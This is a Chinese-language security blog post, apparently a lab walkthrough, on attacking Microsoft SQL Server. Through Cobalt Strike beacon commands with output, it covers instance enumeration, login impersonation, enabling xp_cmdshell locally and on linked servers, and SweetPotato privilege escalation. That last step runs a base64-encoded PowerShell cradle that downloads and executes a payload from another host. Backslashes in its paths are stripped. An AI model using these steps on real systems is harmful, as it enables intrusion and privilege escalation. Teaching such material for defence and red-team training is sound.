前言
微软SQL Server是一个关系型数据库依赖于windows环境,通常用于支持一些商业功能。除了这些功能之外,SQL Server还具有非常大的攻击面,比如命令执行,权限提升,横行移动以及权限维持。
正文
PowerUpSQL和SQLRecon是两款非常优秀的工具用于和SQL Server交互。
Get-SQLInstanceDomain的工作原理是搜索以MSSQL开头的SPN。
这个数据表明SQL-2运行在SQL Server,用户是mssql_svc域账户。
beacon> powershell-import C:ToolsPowerUpSQLPowerUpSQL.ps1
beacon> powershell Get-SQLInstanceDomain
ComputerName : sql-2.dev.cyberbotic.io
Instance : sql-2.dev.cyberbotic.io,1433
DomainAccountSid : 1500000521000672332383313895871914512914091400
DomainAccount : mssql_svc
DomainAccountCn : MS SQL Service
Service : MSSQLSvc
Spn : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
LastLogon : 8/15/2022 7:55 PM
Description :
Get-SQLConnectionTest可以用来测试我们能是否能连接数据库
beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
ComputerName : sql-2.dev.cyberbotic.io
Instance : sql-2.dev.cyberbotic.io,1433
Status : Accessible
Get-SQLServerInfo可以用来收集关于这个数据库的更多信息
beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"
ComputerName : sql-2.dev.cyberbotic.io
Instance : SQL-2
DomainName : DEV
ServiceProcessID : 2668
ServiceName : MSSQLSERVER
ServiceAccount : DEVmssql_svc
AuthenticationMode : Windows Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Standard Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEVbfarmer
IsSysadmin : No
ActiveSessions : 1
可以通过下面这个命令进行在多实例当中收集信息
powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
SQLRecon可以判断我们的用户是什么权限
beacon> execute-assembly C:ToolsSQLReconSQLReconbinReleaseSQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami
[+] Logged in as:
DEVbfarmer
[+] Mapped to the user:
guest
[+] Roles:
User is a member of public role
User is NOT a member of db_owner role
User is NOT a member of db_accessadmin role
User is NOT a member of db_securityadmin role
User is NOT a member of db_ddladmin role
User is NOT a member of db_backupoperator role
User is NOT a member of db_datareader role
User is NOT a member of db_datawriter role
User is NOT a member of db_denydatareader role
User is NOT a member of db_denydatawriter role
User is NOT a member of sysadmin role
User is NOT a member of setupadmin role
User is NOT a member of serveradmin role
User is NOT a member of securityadmin role
User is NOT a member of processadmin role
User is NOT a member of diskadmin role
User is NOT a member of dbcreator role
User is NOT a member of bulkadmin role
of bulkadmin role
MS SQL允许我们通过使用其他用户的权限,当我们不知道这个用户密码的时候,如果我们配置了继承,通过搜索查找。
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';
然后通过搜索ID查找更多信息
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;
SQLRecon也支持查找SQL Server的继承
beacon> execute-assembly C:ToolsSQLReconSQLReconbinReleaseSQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate
[+] Enumerating accounts that can be impersonated on sql-2.dev.cyberbotic.io,1433:
name |
-------
DEVmssql_svc |
通过EXECUTE AS直接使用
EXECUTE AS login = 'DEVmssql_svc'; SELECT SYSTEM_USER;
DEVmssql_svc
EXECUTE AS login = 'DEVmssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin');
1
SQLRecon -i参数支持模拟用户
beacon> execute-assembly C:ToolsSQLReconSQLReconbinReleaseSQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m iwhoami -i DEVmssql_svc
[+] Logged in as:
DEVmssql_svc
[+] Mapped to the user:
dbo
[+] Roles:
User is a member of public role
User is a member of sysadmin role
User is a member of setupadmin role
User is a member of serveradmin role
User is a member of securityadmin role
User is a member of processadmin role
User is a member of diskadmin role
User is a member of dbcreator role
User is a member of bulkadmin role
XP_CMDSHELL可以用于执行在SQL Server当中执行命令,当拥有sysadmin权限的时候。PowerUpSQL中的Invoke-SQLOSCMD提供了这样的一个功能。
beacon> powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults
devmssql_svc
枚举查询xp_cmdshell的配置
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
恢复XP_CMDSHELL
sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL Server支持通过一种链接的方法从 MS SQL Servers中获取数据。可以通过这种方法获取链接信息。
SELECT srvname, srvproduct, rpcout FROM master..sysservers;
通过OpenQuery查找链接
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
检查xp_cmdshell
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
通过下面的方式远程恢复
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io] EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
powershell Get-SQLServerLinkCrawl获取跟实例相关的链接
beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"
Version : SQL Server 2019
Instance : SQL-2
CustomQuery :
Sysadmin : 1
Path : {SQL-2}
User : DEVbfarmer
Links : {SQL-1.CYBERBOTIC.IO}
Version : SQL Server 2019
Instance : SQL-1
CustomQuery :
Sysadmin : 1
Path : {SQL-2, SQL-1.CYBERBOTIC.IO}
User : sa
Links :
这里面的例子运行在 SQL Server当中,这里有一个SelmpersonatePrivilege权限,这个权限允许模仿客户端当认证完成后。
beacon> getuid
[*] You are NT ServiceMSSQLSERVER
beacon> execute-assembly C:ToolsSeatbeltSeatbeltbinReleaseSeatbelt.exe TokenPrivileges
====== TokenPrivileges ======
Current Token's Privileges
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
[*] Completed collection in 0.037 seconds
但是因为原先的账号不是admin权限,所以它不能获取本地正在运行的SYSTEM权限进程。其中一个方法是强制启动一个系统服务认证攻击者的恶意服务,然后这个恶意服务就会获得SYSTEM权限。Sweetpotato就拥有这个功能,这里面是通过打印机漏洞,可以通过execute-assembly执行命令。
beacon> execute-assembly C:ToolsSweetPotatobinReleaseSweetPotato.exe -p C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method PrintSpoofer to launch C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
[+] Triggering notification on evil PIPE \sql-1/pipe/b888d569-b66e-4280-b8c5-995afbb9b02c
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
beacon> connect localhost 4444
[+] established link to child beacon: 10.10.120.25
原文始发于微信公众号(Th0r安全):MS SQL Server攻击面
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论